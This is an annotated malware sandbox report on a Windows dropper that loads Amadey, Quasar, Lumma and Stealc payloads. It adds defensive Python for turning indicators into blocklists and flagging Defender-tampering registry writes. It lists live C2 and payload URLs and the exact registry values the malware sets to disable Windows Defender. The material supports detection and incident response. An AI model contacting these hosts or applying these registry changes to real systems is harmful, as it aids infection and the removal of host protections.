Analysis
  max time kernel: 149s
  max time network: 150s
  platform: windows10-2004_x64
  resource: win10v2004-20250314-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20250314-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 30/03/2025, 14:03
Static task: static1
Behavioral task behavioral1
  Sample: 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
  Resource: win7-20240903-en
Behavioral task behavioral2
  Sample: 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
  Resource: win10v2004-20250314-en
The signature section below is the behavioral2 (Windows 10 2004 x64) run: every memory and file reference in it is prefixed behavioral2/.
General
  Target: 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
  Size: 938KB
  MD5: 84c300a105cb5e140c8c91e2c6ead590
  SHA1: 5bd18b75d71b2824913a508ce28db8d4c2a936b9
  SHA256: edfb2e4f23a9c490eb887fe69d57aab4dea230d0b76e3b1c95babb559c36fa58
  SHA512: eec8f1abe337ec6e09cdf613c015a1cf84a58217f063d884e4a4ef8a925f17f8c7c869ce81e081e81382cb5860cdc46f1b4cb96923b97c0d41e76dd98d99f106
  SSDEEP: 24576:oqDEvCTbMWu7rQYlBQcBiT6rprG8a06u:oTvC/MTQYxsWR7a06
Note on the filename: the family tags in it (agent-tesla, black-basta, cobalt-strike, luca-stealer) are part of the name the sample was submitted under and match none of the family signatures this run produced. The families this run actually identified are Amadey, Quasar, Lumma, Stealc and Healer (see Malware Config and Signatures). Pivot on the hashes, not on the name.
Malware Config
Extracted (download URL; the report attributes it to no family)
  http://176.113.115.7/mine/random.exe
Extracted: amadey
  version: 5.21
  092155  (unlabelled in the report; this position in an Amadey config is the botnet/campaign id)
  C2: http://176.113.115.6
  install_dir: bb556cff4a
  install_file: rapes.exe
  strings_key: a131b127e996a898cd19ffb2d92e481b
  url_paths: /Ni9kiput/index.php
  Check-in URL (C2 joined with url_paths): http://176.113.115.6/Ni9kiput/index.php. The install_file name rapes.exe is the loader seen throughout the Signatures section (PIDs 3592, 3956, 12780, 5656), and C:\Windows\Tasks\rapes.job is its scheduled-task persistence. Note that the download URL above and this C2 sit on adjacent addresses in 176.113.115.0/24.
Extracted: quasar
  version: 1.5.0
  Office04  (unlabelled in the report; this position in a Quasar config is the build tag)
  C2: goku92ad.zapto.org:5000
  a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a  (unlabelled GUID; Quasar builds carry their mutex name in this position)
  encryption_key: BF72099FDBC6B48816529089CF1CF2CF86357D14
  install_name: Client.exe
  log_directory: Logs
  reconnect_delay: 3000
  startup_key: Quasar Modded Client Startup
  subdirectory: SubDir
  zapto.org is a No-IP dynamic-DNS domain, so resolve goku92ad.zapto.org at detection time rather than pinning an address; the startup_key text marks this as a modified Quasar build.
Extracted: lumma
  C2:
    https://navstarx.shop/FoaJSi
    https://metalsyo.digital/opsa
    https://ironloxp.live/aksdd
    https://starcloc.bet/GOksAo
    https://advennture.top/GKsiio
    https://targett.top/dsANGt
    https://spacedbv.world/EKdlsk
    https://galxnetb.today/GsuIAo
    https://rodformi.run/aUosoz
Extracted: stealc
  trump  (unlabelled in the report; this position in a Stealc config is the botnet name)
  C2: http://45.93.20.28
  url_path: /85a1cacf11314eb8.php
  Check-in URL (C2 joined with url_path): http://45.93.20.28/85a1cacf11314eb8.php
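The configuration above is what a responder turns into blocklist and hunt material. The following is an added example, written for this page and not part of the sandbox report or of any of the named families' tooling: it types each extracted C2 entry (IP or domain, port, path), defangs it for tickets, flags C2 addresses that share a network block, and runs the domain set over a few constructed DNS log lines. The DNS lines and the joined check-in URLs for Amadey and Stealc are assumptions made for the example, not captures from this run.

```python
"""Added example (editor-written, not part of the sandbox report or of any of the
families' own tooling): turn the Malware Config entries above into typed,
defanged indicators and run them against a few constructed DNS log lines."""
import ipaddress
from urllib.parse import urlsplit

# Entries copied from the Malware Config section. For amadey and stealc the C2
# host and the url_path(s) are joined into the check-in URL the bot would request.
# The first entry carries no family attribution in the report.
CONFIG = {
    "unattributed": ["http://176.113.115.7/mine/random.exe"],
    "amadey": ["http://176.113.115.6/Ni9kiput/index.php"],
    "quasar": ["goku92ad.zapto.org:5000"],
    "lumma": [
        "https://navstarx.shop/FoaJSi", "https://metalsyo.digital/opsa",
        "https://ironloxp.live/aksdd", "https://starcloc.bet/GOksAo",
        "https://advennture.top/GKsiio", "https://targett.top/dsANGt",
        "https://spacedbv.world/EKdlsk", "https://galxnetb.today/GsuIAo",
        "https://rodformi.run/aUosoz",
    ],
    "stealc": ["http://45.93.20.28/85a1cacf11314eb8.php"],
}

DEFAULT_PORTS = {"http": 80, "https": 443}


def parse_indicator(raw):
    """Split one config entry into (kind, host, port, path); kind is 'ip' or 'domain'."""
    if "://" not in raw:                 # bare host:port, as Quasar stores its C2
        raw = "tcp://" + raw
    u = urlsplit(raw)
    host = u.hostname
    port = u.port or DEFAULT_PORTS.get(u.scheme)
    try:
        ipaddress.ip_address(host)
        kind = "ip"
    except ValueError:
        kind = "domain"
    return kind, host, port, u.path or "/"


def defang(host):
    """Make an indicator safe to paste into tickets and chat."""
    return host.replace(".", "[.]")


def indicator_table(config=CONFIG):
    rows = []
    for family, entries in config.items():
        for raw in entries:
            kind, host, port, path = parse_indicator(raw)
            rows.append({"family": family, "kind": kind, "host": host,
                         "defanged": defang(host), "port": port, "path": path})
    return rows


def shared_ip_networks(rows, prefixlen=24):
    """IP C2s that sit in the same /prefixlen but serve different families:
    a hint that one hosting block is shared by the loader and its payloads."""
    nets = {}
    for r in rows:
        if r["kind"] == "ip":
            net = ipaddress.ip_network(f"{r['host']}/{prefixlen}", strict=False)
            nets.setdefault(str(net), set()).add(r["family"])
    return {n: sorted(f) for n, f in nets.items() if len(f) > 1}


# Constructed DNS log lines (not from the sandbox capture) for the lookup below.
SAMPLE_DNS_LOG = """\
2025-03-30T14:05:01Z host7 query A navstarx.shop.
2025-03-30T14:05:02Z host7 query A www.example.com.
2025-03-30T14:05:09Z host7 query A goku92ad.zapto.org.
"""


def match_dns_log(log=SAMPLE_DNS_LOG, rows=None):
    """Return (qname, family) for every query that hits a configured C2 domain."""
    rows = rows if rows is not None else indicator_table()
    known = {r["host"].lower(): r["family"] for r in rows if r["kind"] == "domain"}
    hits = []
    for line in log.splitlines():
        qname = line.rsplit(" ", 1)[-1].rstrip(".").lower()
        if qname in known:
            hits.append((qname, known[qname]))
    return hits


if __name__ == "__main__":
    table = indicator_table()
    for r in table:
        print(f"{r['family']:<12} {r['kind']:<6} {r['defanged']}:{r['port']}{r['path']}")
    print("shared networks:", shared_ip_networks(table))
    print("dns hits:", match_dns_log())
```

The exact-match lookup is deliberate: the Lumma hosts are bare registered domains and the Quasar host is a dynamic-DNS name, so matching on the full query name avoids false positives on unrelated subdomains of zapto.org. Block the Quasar C2 by name and port (5000) at the egress, since the address behind it can change.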
Signatures
Amadey family
Detects Healer, an antivirus disabler dropper  3 IoCs
  resource (yara_rule: healer)
    behavioral2/memory/10540-31270-0x0000000000B10000-0x0000000000F6E000-memory.dmp
    behavioral2/memory/10540-31286-0x0000000000B10000-0x0000000000F6E000-memory.dmp
    behavioral2/memory/10540-31642-0x0000000000B10000-0x0000000000F6E000-memory.dmp
  PID 10540 is 27b80601f6.exe, the process behind every Windows Defender registry change below; the three hits are the same 0x45E000-byte image at successive snapshots.
Healer family
Lumma family
Sets the Windows Defender DisableAntiSpyware policy  1 IoC
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"  27b80601f6.exe
Modifies Windows Defender Real-time Protection settings  3 TTPs 6 IoCs
  Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection  27b80601f6.exe
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"  27b80601f6.exe
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"  27b80601f6.exe
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"  27b80601f6.exe
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"  27b80601f6.exe
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"  27b80601f6.exe
Sets Windows Defender Features\TamperProtection to 0  1 IoC
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"  27b80601f6.exe
Modifies Windows Defender notification settings  3 TTPs 2 IoCs
  Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications  27b80601f6.exe
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"  27b80601f6.exe
  Reading these entries: every path is under WOW6432Node, the 32-bit view of HKLM\SOFTWARE that a 32-bit process is redirected to. When checking a host, read both the native and the WOW6432Node copies of Policies\Microsoft\Windows Defender, and confirm the live state with Get-MpComputerStatus (RealTimeProtectionEnabled, IsTamperProtected) rather than the registry alone: with Tamper Protection enabled, Defender blocks or ignores such changes, so a write that succeeded in the sandbox does not by itself show that protection went down.
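Registry events in exactly the form this report prints are easy to score automatically. The block below is an added example written for this page, not code from the sandbox or from any detection product: it normalises the WOW6432Node redirection away, matches each write against the set of Defender settings a value weakens, and reports per process what was switched off, tagged with ATT&CK T1562.001 (Impair Defenses: Disable or Modify Tools). SAMPLE_EVENTS repeats the 27b80601f6.exe entries above and adds two constructed lines (a benign svchost.exe write restoring real-time monitoring and a bare key creation) to show what is not flagged.

```python
"""Added example (editor-written, not from the sandbox report): score registry
events of the form the report prints above for Windows Defender tampering.
SAMPLE_EVENTS repeats the report's 27b80601f6.exe entries and adds two
constructed lines (a benign svchost.exe write and a bare key creation)."""
import re

HIVE = "\\REGISTRY\\MACHINE\\SOFTWARE\\"

# Setting -> the value that weakens Defender. Policy values are the GPO view that
# Defender honours; Features\TamperProtection = 0 removes the guard on the rest.
WEAKENING = {
    r"Policies\Microsoft\Windows Defender\DisableAntiSpyware": "1",
    r"Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring": "1",
    r"Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring": "1",
    r"Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection": "1",
    r"Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection": "1",
    r"Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable": "1",
    r"Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications": "1",
    r"Microsoft\Windows Defender\Features\TamperProtection": "0",
}

# One "Set value" line of the report: operation, full key path, quoted value, process.
EVENT = re.compile(
    r'^Set value \((?:int|str)\) (?P<path>\\REGISTRY\\MACHINE\\SOFTWARE\\.+?) = "(?P<value>[^"]*)" (?P<proc>\S+)$'
)

SAMPLE_EVENTS = r"""
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 27b80601f6.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 27b80601f6.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 27b80601f6.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 27b80601f6.exe
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 27b80601f6.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 27b80601f6.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 27b80601f6.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 27b80601f6.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 27b80601f6.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "0" svchost.exe
""".strip().splitlines()


def normalise(path):
    """Drop the hive prefix and the WOW6432Node redirection so that a 32-bit
    process's writes (what the sandbox shows) match the same rule as native ones."""
    p = path[len(HIVE):] if path.startswith(HIVE) else path
    return p[len("WOW6432Node\\"):] if p.startswith("WOW6432Node\\") else p


def assess(events):
    """Map process -> the Defender settings it weakened. Writes that restore a
    setting (value differs from the weakening one) are not counted."""
    hits = {}
    for line in events:
        m = EVENT.match(line.strip())
        if not m:
            continue                      # key creations and other ops carry no value
        key = normalise(m["path"])
        if WEAKENING.get(key) == m["value"]:
            hits.setdefault(m["proc"], set()).add(key.rsplit("\\", 1)[1])
    return {
        proc: {
            "settings": sorted(names),
            "technique": "T1562.001",
            "tamper_protection_off": "TamperProtection" in names,
            "realtime_off": "DisableRealtimeMonitoring" in names,
        }
        for proc, names in hits.items()
    }


if __name__ == "__main__":
    for proc, finding in assess(SAMPLE_EVENTS).items():
        print(proc, finding)
```

The same table drives a live check: on a host, compare the values under both HKLM\SOFTWARE\Policies\Microsoft\Windows Defender and its WOW6432Node twin against WEAKENING, then confirm with Get-MpComputerStatus, because a policy value that is present but ignored (Tamper Protection on) is an attempt, not an outcome.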
Quasar family
Quasar payload  2 IoCs
  resource (yara_rule: family_quasar)
    behavioral2/memory/2268-130-0x0000000007EA0000-0x0000000007EBA000-memory.dmp
    behavioral2/memory/2268-129-0x0000000007D10000-0x0000000007E64000-memory.dmp
  PID 2268 is powershell.exe: the Quasar client runs in memory inside PowerShell, which is also the process making six of the seven blocklisted network requests below.
Stealc family
Suspicious use of NtCreateUserProcessOtherParentProcess  1 IoC
  PID 6128 created 972  | pid 6128 | Process MSBuild.exe | procid_target 51
  6128 is the MSBuild.exe instance that TbV75ZR.exe injected into (SetThreadContext below); starting a child under a different parent breaks the parent/child correlation EDR telemetry relies on.
Identifies VirtualBox via ACPI registry values (likely anti-VM)  2 TTPs 10 IoCs
  Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ by: rapes.exe (4 times), TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE, 27b80601f6.exe, 17309ae496.exe, eea22fbd05.exe, ae27dc3fa3.exe, 4258008d71.exe
Blocklisted process makes network request  7 IoCs
  flow 20: pid 1544 powershell.exe
  flows 31, 71, 149, 165, 264, 305: pid 2268 powershell.exe
Command and Scripting Interpreter: PowerShell  1 TTPs 4 IoCs
  Run PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  pids: 4024 powershell.exe, 4580 powershell.exe, 1544 powershell.exe, 2268 powershell.exe
  The description is the signature's generic text; no Exclusions registry write appears anywhere in this report, and the Defender changes it does show are the policy writes by 27b80601f6.exe above.
Downloads MZ/PE file  9 IoCs
  flow 20: 1544 powershell.exe
  flows 28, 58, 61: 3592 rapes.exe
  flow 60: 4440 svchost.exe
  flow 106: 3592 rapes.exe (4 times)
  Flow 20 is the first stage: powershell.exe 1544 (spawned via mshta.exe) fetches a PE and then launches TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE (2736), which installs rapes.exe; rapes.exe 3592, the Amadey loader, pulls the remaining payloads.
Drops file in Drivers directory  2 IoCs
  File created C:\Windows\System32\Drivers\9e186137.sys  81a4e8fe.exe
  File created C:\Windows\System32\Drivers\klupd_9e186137a_arkmon.sys  81a4e8fe.exe
Sets service image path in registry  2 TTPs 3 IoCs
  Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QDgAc_3648\ImagePath = "\??\C:\Windows\Temp\gJt1b9_3648.sys"  tzutil.exe
  Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\9e186137\ImagePath = "System32\Drivers\9e186137.sys"  81a4e8fe.exe
  Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_9e186137a_arkmon\ImagePath = "System32\Drivers\klupd_9e186137a_arkmon.sys"  81a4e8fe.exe
  tzutil.exe here is PID 3648, listed under Executes dropped EXE and holding SeLoadDriverPrivilege: a dropped binary named after the Windows time-zone utility, not C:\Windows\System32\tzutil.exe. The service name and driver file both embed its PID (_3648), and the driver is loaded from C:\Windows\Temp. The klupd_*_arkmon.sys naming is the pattern used by the anti-rootkit driver shipped with Kaspersky's Virus Removal Tool; that is a lead to verify from the dropped file's signature, not a conclusion of this report.
Checks BIOS information in registry  2 TTPs 20 IoCs
  BIOS information is often read in order to detect sandboxing environments.
  Key values queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion and \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
  by: rapes.exe (4 times each), and once each by 17309ae496.exe, 27b80601f6.exe, TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE, eea22fbd05.exe, 4258008d71.exe, ae27dc3fa3.exe
Checks computer location settings  2 TTPs 6 IoCs
  Looks up the country code configured in the registry, likely a geofence.
  Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation by: cmd.exe, 7IIl2eE.exe, 81a4e8fe.exe, mshta.exe, TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE, rapes.exe
Deletes itself  1 IoC
  3836 w32tm.exe  (a dropped executable named after the Windows time service tool; see Executes dropped EXE)
Drops startup file  2 IoCs
  File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c2309d9f.cmd  powershell.exe
  File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c2309d9f.cmd  powershell.exe
Executes dropped EXE  23 IoCs
  2736 TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE, 3592 rapes.exe, 2512 kO2IdCz.exe, 2832 Rm3cVPI.exe, 5388 TbV75ZR.exe, 3956 rapes.exe, 4844 7IIl2eE.exe, 5724 u75a1_003.exe, 2380 Passwords.com, 4472 17309ae496.exe, 3648 tzutil.exe, 3836 w32tm.exe, 7028 EPTwCQd.exe, 5352 eea22fbd05.exe, 7508 bd762c8745.exe, 7816 ae27dc3fa3.exe, 4952 661d2f9c.exe, 2672 4258008d71.exe, 3188 81a4e8fe.exe, 12780 rapes.exe, 12444 44f5ba506b.exe, 10540 27b80601f6.exe, 5656 rapes.exe
Identifies Wine through registry keys  2 TTPs 10 IoCs
  Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
  Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine by: rapes.exe (4 times), 4258008d71.exe, TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE, 17309ae496.exe, eea22fbd05.exe, ae27dc3fa3.exe, 27b80601f6.exe
  The same seven binaries (rapes.exe, TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE, 17309ae496.exe, eea22fbd05.exe, ae27dc3fa3.exe, 4258008d71.exe, 27b80601f6.exe) perform the VirtualBox ACPI, BIOS, Wine and NtSetInformationThreadHideFromDebugger checks: the loader and the modules it fetches share one anti-analysis routine.
Impair Defenses: Safe Mode Boot  1 TTPs 3 IoCs
  Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\9e186137.sys  81a4e8fe.exe
  Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\9e186137.sys\ = "Driver"  81a4e8fe.exe
  Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\9e186137.sys  81a4e8fe.exe
  Registering the dropped 9e186137.sys under SafeBoot\Minimal makes it load in Safe Mode as well; the key is removed again before the run ends.
Loads dropped DLL  15 IoCs
  3188 81a4e8fe.exe (15 times)
Reads user/profile data of local email clients  2 TTPs
  Email clients store some user data on disk where infostealers will often target it.
Windows security modification  2 TTPs 2 IoCs
  Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features  27b80601f6.exe
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"  27b80601f6.exe
Adds Run key to start application  2 TTPs 8 IoCs
  (HKU = \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion; HKLM = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion)
  Set value (str) HKU\Run\27b80601f6.exe = "C:\Users\Admin\AppData\Local\Temp\10381880101\27b80601f6.exe"  rapes.exe
  Set value (str) HKU\Run\ae27dc3fa3.exe = "C:\Users\Admin\AppData\Local\Temp\10381850101\ae27dc3fa3.exe"  rapes.exe
  Set value (str) HKU\Run\4258008d71.exe = "C:\Users\Admin\AppData\Local\Temp\10381860101\4258008d71.exe"  rapes.exe
  Set value (str) HKU\Run\44f5ba506b.exe = "C:\Users\Admin\AppData\Local\Temp\10381870101\44f5ba506b.exe"  rapes.exe
  Set value (str) HKLM\RunOnce\wextract_cleanup0 = "rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\""  kO2IdCz.exe
  Set value (str) HKU\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"  svchost.exe
  Set value (str) HKLM\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"  svchost.exe
  Set value (str) HKLM\RunOnce\ab46dfaa-8c5a-473f-9c3e-8c0f4debbbca = ""C:\Users\Admin\AppData\Local\Temp\{d082aa7e-6cdb-4325-8b76-01a5f4c44c90}\ab46dfaa-8c5a-473f-9c3e-8c0f4debbbca.cmd""  81a4e8fe.exe
  The four HKU\Run entries written by rapes.exe are the Amadey loader registering each module it downloaded (the 1038xxxx101 directory names are its per-payload drop folders). The wextract_cleanup0 entry with IXP000.TMP is the standard cleanup record written by Windows' IExpress self-extractor stub, so kO2IdCz.exe is an IExpress package. The aitstatic.exe entries are written by an svchost.exe; the report also lists an svchost.exe (PID 4440) downloading a PE in flow 60 but does not show its parent, so check whether it is the genuine service host before treating those as legitimate.
Checks installed software on the system  1 TTPs
  Looks up Uninstall key entries in the registry to enumerate software on the system.
Writes to the Master Boot Record (MBR)  1 TTPs 2 IoCs
  Bootkits write to the MBR to gain persistence at a level below the operating system.
  File opened for modification \??\PhysicalDrive0  81a4e8fe.exe
  File opened for modification \??\PHYSICALDRIVE0  17309ae496.exe
  Both IoCs are raw-disk handles opened with write access; the report does not show an actual write to sector 0, so confirm from the disk image before classifying this as a bootkit.
AutoIT Executable  1 IoC
  AutoIT scripts compiled to PE executables.
  resource behavioral2/files/0x000500000001ee9f-31200.dat  (yara_rule: autoit_exe)
Enumerates processes with tasklist  1 TTPs 2 IoCs
  4256 tasklist.exe, 5212 tasklist.exe
Suspicious use of NtSetInformationThreadHideFromDebugger  10 IoCs
  2736 TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE, 3592 rapes.exe, 3956 rapes.exe, 4472 17309ae496.exe, 5352 eea22fbd05.exe, 7816 ae27dc3fa3.exe, 2672 4258008d71.exe, 12780 rapes.exe, 10540 27b80601f6.exe, 5656 rapes.exe
Suspicious use of SetThreadContext  2 IoCs
  PID 5388 set thread context of 6128  | 5388 TbV75ZR.exe | procid_target 121
  PID 7028 set thread context of 7048  | 7028 EPTwCQd.exe | procid_target 160
  Both targets are MSBuild.exe instances (6128 and 7048 appear as MSBuild.exe under EnumeratesProcesses): two dropped loaders hollow a freshly started, signed .NET build tool. 6128 later crashes (Program crash below).
Checks for VirtualBox DLLs, possible anti-VM trick  1 TTPs 2 IoCs
  Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
  File opened (read-only) \??\VBoxMiniRdrDN  661d2f9c.exe
  File opened (read-only) \??\VBoxMiniRdrDN  81a4e8fe.exe
Drops file in Windows directory  14 IoCs
  File opened for modification by 7IIl2eE.exe: C:\Windows\LogisticsNotre, C:\Windows\ProvidingMilwaukee, C:\Windows\BrandonStat, C:\Windows\CorrectionsGeographic, C:\Windows\GentleLogging, C:\Windows\WallpapersHo, C:\Windows\EstateLegislative, C:\Windows\JenniferSubdivision, C:\Windows\RowTopics, C:\Windows\DiscussedFacial, C:\Windows\EnglandDeleted, C:\Windows\PotteryUser, C:\Windows\SpecificsHeaven
  File created C:\Windows\Tasks\rapes.job  TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE
  rapes.job is a Task Scheduler job file for the Amadey loader (install_file rapes.exe), i.e. its scheduled-task persistence; the thirteen two-word files from 7IIl2eE.exe are written straight into C:\Windows, which requires elevated rights.
Enumerates physical storage devices  1 TTPs
  Attempts to interact with connected storage/optical drive(s).
Program crash  1 IoC
  4836 WerFault.exe reporting on pid 6128  | procid_target 121
System Location Discovery: System Language Discovery  1 TTPs 44 IoCs
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language by: cmd.exe (6 times), CMD.exe, taskkill.exe (5 times), powershell.exe (3 times), findstr.exe (3 times), tasklist.exe (2 times), MSBuild.exe (2 times), 44f5ba506b.exe (2 times), and once each by Rm3cVPI.exe, 4258008d71.exe, rapes.exe, 27b80601f6.exe, TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE, fontdrvhost.exe, 17309ae496.exe, eea22fbd05.exe, bd762c8745.exe, extrac32.exe, Passwords.com, mshta.exe, schtasks.exe, 7IIl2eE.exe, 81a4e8fe.exe, ae27dc3fa3.exe, u75a1_003.exe, 661d2f9c.exe and 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
  Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage  44f5ba506b.exe
  This key is read during ordinary process start-up, so the list mostly mirrors which processes ran (cmd, findstr, taskkill, tasklist, schtasks, extrac32 are stock utilities). The one deliberate-looking read is 44f5ba506b.exe querying InstallLanguage, the usual CIS-locale check. Note also fontdrvhost.exe: per the WriteProcessMemory records it is PID 4588, a child written into by the injected MSBuild.exe (6128), not the system's font driver host.
System Network Configuration Discovery: Internet Connection Discovery  1 TTPs 64 IoCs
  Adversaries may check for Internet connectivity on compromised systems.
  PING.EXE pids: 10192, 9768, 10604, 12180, 6428, 11752, 11052, 9424, 9644, 10640, 11628, 6380, 11196, 10300, 9992, 10836, 12944, 11088, 9744, 11904, 12308, 13108, 12740, 1836, 11520, 11648, 12044, 12552, 13020, 6408, 13016, 12760, 4576, 10396, 10856, 12324, 6980, 12988, 12164, 6528, 11948, 11504, 10508, 10268, 10748, 13076, 13036, 12416, 11860, 11412, 13156, 5136, 13220, 11136, 9932, 11308, 6372, 13288, 6476, 12640, 6184, 10940, 12932, 6752
Checks processor information in registry  2 TTPs 18 IoCs
  Processor information is often read in order to detect sandboxing environments.
  All 18 entries come from firefox.exe (PID 11864 elsewhere in this report): Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (7 times); Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz (7 times), \VendorIdentifier, \Update Revision, \Update Signature, \ProcessorNameString (once each)
  None of the dropped payloads trigger this signature; a browser reading CPU details is expected, so weight it accordingly.
Kills process with taskkill  5 IoCs
  12400 taskkill.exe, 6312 taskkill.exe, 12244 taskkill.exe, 12128 taskkill.exe, 12028 taskkill.exe
Modifies registry class  3 IoCs
  Key created \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings  firefox.exe
  Key created \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings  cmd.exe
  Key created \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings  rapes.exe
Modifies registry key  1 TTPs 2 IoCs
  12848 reg.exe, 12832 reg.exe
Runs ping.exe  1 TTPs 64 IoCs
